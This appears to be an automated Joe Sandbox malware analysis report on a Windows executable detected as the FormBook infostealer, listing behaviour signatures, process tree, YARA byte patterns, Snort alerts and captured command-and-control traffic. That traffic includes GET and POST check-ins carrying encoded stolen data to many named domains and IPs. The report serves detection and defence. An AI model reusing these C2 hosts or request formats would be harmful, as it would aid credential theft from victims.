Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
zeuhAxTIRX.exe

Overview

General Information

Sample Name:zeuhAxTIRX.exe
Analysis ID:799425
MD5:271ae718b77b74826bb47fa7495eb565
SHA1:45c8612d99bc2d05fb9cf42c1d84631c8e68b479
SHA256:c0fd42b42f88ead8da8a49c472155197542576a4804fb270118292dfc5d40b77
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • zeuhAxTIRX.exe (PID: 1236 cmdline: C:\Users\user\Desktop\zeuhAxTIRX.exe MD5: 271AE718B77B74826BB47FA7495EB565)
    • explorer.exe (PID: 3528 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • autoconv.exe (PID: 5092 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
      • rundll32.exe (PID: 5240 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.576146371.0000000000810000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000000.00000002.576146371.0000000000810000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x1f080:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xae3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x182f7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000000.00000002.576146371.0000000000810000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x180f5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x17b91:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x181f7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1836f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xaa0a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x16ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1de27:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1edda:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000008.00000002.830673789.00000000041A0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000008.00000002.830673789.00000000041A0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x1f080:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xae3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x182f7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Click to see the 13 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.zeuhAxTIRX.exe.e50000.1.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0.2.zeuhAxTIRX.exe.e50000.1.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x20053:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xbe12:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x192ca:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        0.2.zeuhAxTIRX.exe.e50000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x190c8:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x18b64:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x191ca:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x19342:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xb9dd:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x17daf:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1edfa:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1fdad:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

        Sigma Signatures

        No Sigma rule has matched

        Snort Signatures

        Timestamp:192.168.2.4199.59.243.22249711802031453 02/06/23-14:39:32.673954
        SID:2031453
        Source Port:49711
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.4199.59.243.22249711802031449 02/06/23-14:39:32.673954
        SID:2031449
        Source Port:49711
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.4199.59.243.22249711802031412 02/06/23-14:39:32.673954
        SID:2031412
        Source Port:49711
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for submitted file
        Source: zeuhAxTIRX.exeReversingLabs: Detection: 56%
        Source: zeuhAxTIRX.exeVirustotal: Detection: 54%Perma Link
        Yara detected FormBook
        Source: Yara matchFile source: 0.2.zeuhAxTIRX.exe.e50000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000000.00000002.576146371.0000000000810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.830673789.00000000041A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.830024885.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.576236738.0000000000840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Antivirus / Scanner detection for submitted sample
        Source: zeuhAxTIRX.exeAvira: detected
        Antivirus detection for URL or domain
        Source: http://www.lastmilerent.com/dhxt/?UlkAHnsI=Y88RZnbUg+vg39XJ7Xe2z5ar6Steri0PsoUs6lQE0S1yE6fkUvOaIgRIh7ssJiEciN8m5Ru/FUUSgB9hFV8vRHrdywJO04cRIQ==&2ani-=qhGAdkIKoHAvira URL Cloud: Label: malware
        Source: http://www.frogair.online/dhxt/?2ani-=qhGAdkIKoH&UlkAHnsI=u+zktjrvfgHZI+Oz0oPk7S6z3SS4eQzlxj31ise38TMlPN2sQxJreAld73CkW67638HFSoqfGq7wTiBJHuDRXWnGAUEuFgsZZw==Avira URL Cloud: Label: malware
        Source: http://www.dezella.xyz/dhxt/?2ani-=qhGAdkIKoH&UlkAHnsI=wbPnfyQfXR4PZAPT09H9uXzHHhq4HhWkGwCNvg5IVQDwAqkAqM9rZA7nMC+fOtAInmSNsI36IN462a2w51jaKCiXRWhZTFR9pQ==Avira URL Cloud: Label: malware
        Source: http://www.fildoor.store/dhxt/Avira URL Cloud: Label: malware
        Source: http://www.cmproutdoors.com/dhxt/Avira URL Cloud: Label: malware
        Source: http://www.cmproutdoors.com/dhxt/?UlkAHnsI=Hdg1eSHwHIdp18MOehnfDNNUuCDltrvSJkToDZ2NoA5/soeDYsGvmU4g1NuJE+12L7lxU5+TL8fcs8OKnDw+uls6plsXJT+jSQ==&2ani-=qhGAdkIKoHAvira URL Cloud: Label: malware
        Source: http://www.gmbuxie.net/dhxt/?2ani-=qhGAdkIKoH&UlkAHnsI=fnx//ZKuIyFV+ywUcXCMreymOGqG1X949mc4/IKLw0PV+ItzLTg5d1T/xYzfA/mrlDLEGtysh8NCeOJ7jTcJkgo8rK5p5nSJ6g==Avira URL Cloud: Label: malware
        Source: http://www.moneycarrewards.com/dhxt/?2ani-=qhGAdkIKoH&UlkAHnsI=stngXlFCM6RnlHv9W0Owvb5Q7a/1GW7Bx3QsCD4j5Kk1nwRSFSS2AVlFvVf479jy1oAGro1MyvipTvqZ1lHNwKEX6xCFHE1kEA==Avira URL Cloud: Label: malware
        Source: http://www.gmbuxie.net/dhxt/Avira URL Cloud: Label: malware
        Source: http://www.frogair.online/dhxt/Avira URL Cloud: Label: malware
        Source: http://www.lastmilerent.com/dhxt/Avira URL Cloud: Label: malware
        Source: http://www.dezella.xyz/dhxt/Avira URL Cloud: Label: malware
        Machine Learning detection for sample
        Source: zeuhAxTIRX.exeJoe Sandbox ML: detected
        Source: 0.2.zeuhAxTIRX.exe.e50000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
        Source: 0.0.zeuhAxTIRX.exe.e50000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
        Source: zeuhAxTIRX.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: zeuhAxTIRX.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: Binary string: wntdll.pdbUGP source: zeuhAxTIRX.exe, 00000000.00000003.525576790.0000000000A46000.00000004.00000020.00020000.00000000.sdmp, zeuhAxTIRX.exe, 00000000.00000002.576940638.0000000000F9F000.00000040.00001000.00020000.00000000.sdmp, zeuhAxTIRX.exe, 00000000.00000002.576940638.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, zeuhAxTIRX.exe, 00000000.00000003.526888112.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.578096902.0000000004242000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.575803358.00000000040AA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: zeuhAxTIRX.exe, 00000000.00000003.525576790.0000000000A46000.00000004.00000020.00020000.00000000.sdmp, zeuhAxTIRX.exe, 00000000.00000002.576940638.0000000000F9F000.00000040.00001000.00020000.00000000.sdmp, zeuhAxTIRX.exe, 00000000.00000002.576940638.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, zeuhAxTIRX.exe, 00000000.00000003.526888112.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.578096902.0000000004242000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.575803358.00000000040AA000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02A63200 FindFirstFileW,FindNextFileW,FindClose,8_2_02A63200
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02A631FA FindFirstFileW,FindNextFileW,FindClose,8_2_02A631FA
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop edi8_2_02A58D80
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop edi8_2_02A58D6F
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop edi8_2_02A58D7F

        Networking

        barindex
        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\explorer.exeNetwork Connect: 63.141.242.45 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 172.67.156.58 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 87.236.16.107 80Jump to behavior
        Source: C:\Windows\explorer.exeDomain query: www.ontheverge.wales
        Source: C:\Windows\explorer.exeDomain query: www.lastmilerent.com
        Source: C:\Windows\explorer.exeDomain query: www.moneycarrewards.com
        Source: C:\Windows\explorer.exeNetwork Connect: 199.192.28.121 80Jump to behavior
        Source: C:\Windows\explorer.exeDomain query: www.dezella.xyz
        Source: C:\Windows\explorer.exeNetwork Connect: 185.215.4.36 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 132.148.233.235 80Jump to behavior
        Source: C:\Windows\explorer.exeDomain query: www.utmedicined.com
        Source: C:\Windows\explorer.exeDomain query: www.gmbuxie.net
        Source: C:\Windows\explorer.exeNetwork Connect: 217.76.156.252 80Jump to behavior
        Source: C:\Windows\explorer.exeDomain query: www.cmproutdoors.com
        Source: C:\Windows\explorer.exeNetwork Connect: 156.255.170.114 80Jump to behavior
        Source: C:\Windows\explorer.exeDomain query: www.0w3jy.com
        Source: C:\Windows\explorer.exeDomain query: www.frogair.online
        Source: C:\Windows\explorer.exeDomain query: www.fildoor.store
        Source: C:\Windows\explorer.exeNetwork Connect: 199.59.243.222 80Jump to behavior
        Source: C:\Windows\explorer.exeDomain query: www.parkhomenko-zinaida.ru
        Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.72 80Jump to behavior
        Source: C:\Windows\explorer.exeDomain query: www.b-yy.xyz
        Source: C:\Windows\explorer.exeNetwork Connect: 164.88.122.250 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 154.205.192.37 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 3.127.73.216 80Jump to behavior
        Source: C:\Windows\explorer.exeDomain query: www.staciesellslka.com
        Snort IDS alert for network traffic
        Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49711 -> 199.59.243.222:80
        Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49711 -> 199.59.243.222:80
        Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49711 -> 199.59.243.222:80
        Performs DNS queries to domains with low reputation
        Source: C:\Windows\explorer.exeDNS query: www.b-yy.xyz
        Source: C:\Windows\explorer.exeDNS query: www.dezella.xyz
        Source: Joe Sandbox ViewASN Name: NOCIXUS NOCIXUS
        Source: global trafficHTTP traffic detected: GET /dhxt/?2ani-=qhGAdkIKoH&UlkAHnsI=GMJpuu0CUPuENYia2wBq5vF0+NhzyO/+t2WdNBBbZP32/2p6mtsWQVykz4YrZzp7DrUWVvB/4Ftn1F9mFxE3fjZXBYQ8lylMnw== HTTP/1.1Host: www.utmedicined.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /dhxt/?UlkAHnsI=iu/H8WHS+bo1nMJvRdq/iC6svF2/HYXNnbtNRbi1LgexvtsRTtlIctNP2ExBqlFb1kQrkeEU0URUxcClbqwbX/pXEbDFcWstrA==&2ani-=qhGAdkIKoH HTTP/1.1Host: www.b-yy.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /dhxt/?2ani-=qhGAdkIKoH&UlkAHnsI=8voFCfVULodAC65O8zxk+Vq77CzX57WY/dJ15bldeZcww2bgGpUJFoE2xkKZjlmzbDc1YNM8KHZO1I2ZrlZ1XIcvUu8N2Hwmug== HTTP/1.1Host: www.fildoor.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /dhxt/?UlkAHnsI=GgGZ8XnpwcXWt0AEsp/4OdJSGPmAlrgxEwmnAr+KMWurQo94+Qn94Sj3VSd8nLdkKuBNUoOidT9aHFNGgyN51vgfDTNlsm7YLA==&2ani-=qhGAdkIKoH HTTP/1.1Host: www.parkhomenko-zinaida.ruConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /dhxt/?2ani-=qhGAdkIKoH&UlkAHnsI=wbPnfyQfXR4PZAPT09H9uXzHHhq4HhWkGwCNvg5IVQDwAqkAqM9rZA7nMC+fOtAInmSNsI36IN462a2w51jaKCiXRWhZTFR9pQ== HTTP/1.1Host: www.dezella.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /dhxt/?UlkAHnsI=ifokxT4WC6kpOYMw3zM3kyJ4LmgGiGZS0703YorY1YsjQRfHkIwKIIkPfqFmPEtQEdhteK5+EAiLfL0gYcUW2DoEXWveCWJMNw==&2ani-=qhGAdkIKoH HTTP/1.1Host: www.staciesellslka.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /dhxt/?2ani-=qhGAdkIKoH&UlkAHnsI=fnx//ZKuIyFV+ywUcXCMreymOGqG1X949mc4/IKLw0PV+ItzLTg5d1T/xYzfA/mrlDLEGtysh8NCeOJ7jTcJkgo8rK5p5nSJ6g== HTTP/1.1Host: www.gmbuxie.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /dhxt/?UlkAHnsI=Y88RZnbUg+vg39XJ7Xe2z5ar6Steri0PsoUs6lQE0S1yE6fkUvOaIgRIh7ssJiEciN8m5Ru/FUUSgB9hFV8vRHrdywJO04cRIQ==&2ani-=qhGAdkIKoH HTTP/1.1Host: www.lastmilerent.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /dhxt/?2ani-=qhGAdkIKoH&UlkAHnsI=stngXlFCM6RnlHv9W0Owvb5Q7a/1GW7Bx3QsCD4j5Kk1nwRSFSS2AVlFvVf479jy1oAGro1MyvipTvqZ1lHNwKEX6xCFHE1kEA== HTTP/1.1Host: www.moneycarrewards.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /dhxt/?UlkAHnsI=Hdg1eSHwHIdp18MOehnfDNNUuCDltrvSJkToDZ2NoA5/soeDYsGvmU4g1NuJE+12L7lxU5+TL8fcs8OKnDw+uls6plsXJT+jSQ==&2ani-=qhGAdkIKoH HTTP/1.1Host: www.cmproutdoors.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /dhxt/?2ani-=qhGAdkIKoH&UlkAHnsI=FfOdtLZjvYP8bXm/clPh5g/7x4+RQqyIHbKOkwKrIc0A7AIax+WKqABy5xS4eERJuSBeHh7W6Lqe0kjzR+0vnl8saQ3UdmHxRw== HTTP/1.1Host: www.ontheverge.walesConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /dhxt/?UlkAHnsI=FUiWQqlvvhcOKQQuFFk1YdMODVpPUkI9QkHdYK1vvGDvQckHnduU+ib0kpFdu5Ayi+Be8xCaUG88sYAzbmt0txmA9iBLGYJGLw==&2ani-=qhGAdkIKoH HTTP/1.1Host: www.0w3jy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /dhxt/?2ani-=qhGAdkIKoH&UlkAHnsI=u+zktjrvfgHZI+Oz0oPk7S6z3SS4eQzlxj31ise38TMlPN2sQxJreAld73CkW67638HFSoqfGq7wTiBJHuDRXWnGAUEuFgsZZw== HTTP/1.1Host: www.frogair.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: Joe Sandbox ViewIP Address: 63.141.242.45 63.141.242.45
        Source: global trafficHTTP traffic detected: POST /dhxt/ HTTP/1.1Host: www.b-yy.xyzConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.b-yy.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.b-yy.xyz/dhxt/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 6c 6b 41 48 6e 73 49 3d 76 73 58 6e 28 6d 71 75 28 4b 67 77 68 2d 39 47 63 2d 4f 66 32 44 4f 7a 75 6e 69 66 4b 4c 28 36 77 72 56 4e 59 71 65 43 63 44 6a 57 68 62 77 32 59 34 34 7a 47 36 63 41 67 7a 70 65 79 47 4e 47 67 58 5a 6f 78 66 67 32 34 53 64 70 68 4a 62 48 65 5a 38 34 53 4b 4e 74 63 36 69 6d 59 45 34 35 75 39 49 4a 7a 78 5a 4d 55 36 68 75 75 70 6f 48 4a 6f 68 59 75 66 4b 77 72 63 48 65 50 6b 64 6c 4c 4b 67 33 50 66 72 56 54 47 39 39 4b 77 78 76 36 34 5a 43 43 6a 36 56 4c 53 74 75 32 50 34 31 33 43 61 6b 68 37 57 69 77 43 38 6e 4f 57 6d 5f 4b 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: UlkAHnsI=vsXn(mqu(Kgwh-9Gc-Of2DOzunifKL(6wrVNYqeCcDjWhbw2Y44zG6cAgzpeyGNGgXZoxfg24SdphJbHeZ84SKNtc6imYE45u9IJzxZMU6huupoHJohYufKwrcHePkdlLKg3PfrVTG99Kwxv64ZCCj6VLStu2P413Cakh7WiwC8nOWm_Kw).
        Source: global trafficHTTP traffic detected: POST /dhxt/ HTTP/1.1Host: www.fildoor.storeConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.fildoor.storeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.fildoor.store/dhxt/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 6c 6b 41 48 6e 73 49 3d 78 74 41 6c 42 72 30 70 50 71 31 39 58 4a 31 62 7e 42 63 30 32 51 37 41 31 45 4b 64 35 6f 61 62 7e 63 6b 79 37 65 64 76 62 6f 70 76 77 77 62 63 5a 50 35 49 51 63 64 35 6b 68 71 52 79 57 32 70 61 78 77 45 4a 2d 4d 61 44 78 52 6f 6b 74 4b 48 76 41 35 39 55 38 55 56 47 38 55 5f 35 68 5a 78 69 77 48 41 6e 54 31 68 53 6a 69 42 50 51 4f 44 74 4c 6d 75 6c 34 32 5f 37 4f 4c 51 49 49 49 78 31 59 37 51 38 56 72 76 41 56 73 72 6b 41 74 69 7a 46 6b 50 32 75 75 6f 38 4e 7e 59 55 71 6c 4b 77 51 4f 79 72 69 57 57 55 2d 62 62 36 7a 61 79 6f 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: UlkAHnsI=xtAlBr0pPq19XJ1b~Bc02Q7A1EKd5oab~cky7edvbopvwwbcZP5IQcd5khqRyW2paxwEJ-MaDxRoktKHvA59U8UVG8U_5hZxiwHAnT1hSjiBPQODtLmul42_7OLQIIIx1Y7Q8VrvAVsrkAtizFkP2uuo8N~YUqlKwQOyriWWU-bb6zayog).
        Source: global trafficHTTP traffic detected: POST /dhxt/ HTTP/1.1Host: www.parkhomenko-zinaida.ruConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.parkhomenko-zinaida.ruUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.parkhomenko-zinaida.ru/dhxt/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 6c 6b 41 48 6e 73 49 3d 4c 69 75 35 28 68 47 54 35 63 58 54 6f 30 63 65 31 4d 32 69 44 39 59 6e 41 59 71 52 74 35 56 74 4c 52 72 62 4a 35 47 7a 4b 6c 6d 72 61 4e 64 70 39 77 71 4c 71 45 28 44 56 30 39 69 77 72 73 5f 42 2d 74 55 48 59 47 50 52 79 77 47 65 6d 35 48 72 77 70 6f 38 4c 34 42 64 77 78 36 71 56 54 77 45 66 47 79 43 61 74 64 75 53 70 6d 6d 42 6b 75 54 48 46 71 49 64 75 57 5a 34 69 4b 36 7a 52 4b 77 4d 5a 6b 4c 63 44 78 6d 31 51 68 78 30 73 2d 6a 48 35 56 51 36 7e 39 5a 49 31 6c 48 43 76 56 4c 64 49 4d 51 58 58 31 53 55 41 57 66 59 76 4e 79 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: UlkAHnsI=Liu5(hGT5cXTo0ce1M2iD9YnAYqRt5VtLRrbJ5GzKlmraNdp9wqLqE(DV09iwrs_B-tUHYGPRywGem5Hrwpo8L4Bdwx6qVTwEfGyCatduSpmmBkuTHFqIduWZ4iK6zRKwMZkLcDxm1Qhx0s-jH5VQ6~9ZI1lHCvVLdIMQXX1SUAWfYvNyw).
        Source: global trafficHTTP traffic detected: POST /dhxt/ HTTP/1.1Host: www.dezella.xyzConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.dezella.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.dezella.xyz/dhxt/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 6c 6b 41 48 6e 73 49 3d 39 5a 6e 48 63 48 41 46 59 6d 4d 70 55 58 62 31 78 49 62 4e 69 41 75 4d 47 6a 50 36 46 54 44 31 51 42 33 42 7a 53 39 52 55 6a 71 58 47 4d 6b 47 71 4d 77 33 44 52 44 65 4f 79 47 65 59 76 6b 53 6f 32 6e 47 79 5a 76 69 56 64 73 41 71 59 69 48 30 47 48 67 4c 56 75 31 49 43 6c 6e 58 33 39 56 71 6f 79 63 37 6a 30 47 71 33 38 56 7a 42 74 4d 56 61 6c 31 59 30 41 38 78 33 6e 62 34 63 70 55 6b 75 63 2d 56 70 6e 54 53 50 57 78 55 51 72 5f 5a 44 39 79 52 54 4d 6d 68 54 39 68 5a 49 4d 64 64 2d 37 77 73 56 44 55 70 71 30 50 38 6d 50 69 4d 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: UlkAHnsI=9ZnHcHAFYmMpUXb1xIbNiAuMGjP6FTD1QB3BzS9RUjqXGMkGqMw3DRDeOyGeYvkSo2nGyZviVdsAqYiH0GHgLVu1IClnX39Vqoyc7j0Gq38VzBtMVal1Y0A8x3nb4cpUkuc-VpnTSPWxUQr_ZD9yRTMmhT9hZIMdd-7wsVDUpq0P8mPiMg).
        Source: global trafficHTTP traffic detected: POST /dhxt/ HTTP/1.1Host: www.staciesellslka.comConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.staciesellslka.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.staciesellslka.com/dhxt/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 6c 6b 41 48 6e 73 49 3d 76 64 41 45 79 6a 55 51 47 39 64 69 61 71 4d 6a 33 7a 41 62 67 6b 41 37 4b 32 70 55 69 58 41 4a 67 6f 6c 4c 61 36 28 45 79 4c 74 70 4f 55 43 36 35 5a 4e 71 65 66 59 2d 61 2d 4a 4e 66 45 55 55 50 4e 78 59 41 4b 59 4f 59 47 6d 69 42 49 56 43 53 35 73 66 75 45 34 58 57 6d 72 4c 62 48 4a 65 42 4a 74 52 56 4f 38 52 6b 2d 32 66 65 7a 49 31 33 51 6e 71 7a 45 68 64 31 47 51 63 73 43 74 47 75 37 78 36 4e 77 58 49 48 79 7e 58 49 72 4c 46 55 49 59 54 33 4a 62 55 52 46 79 6e 76 46 41 6e 74 43 49 6c 68 72 59 32 53 36 62 78 62 38 64 5a 4b 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 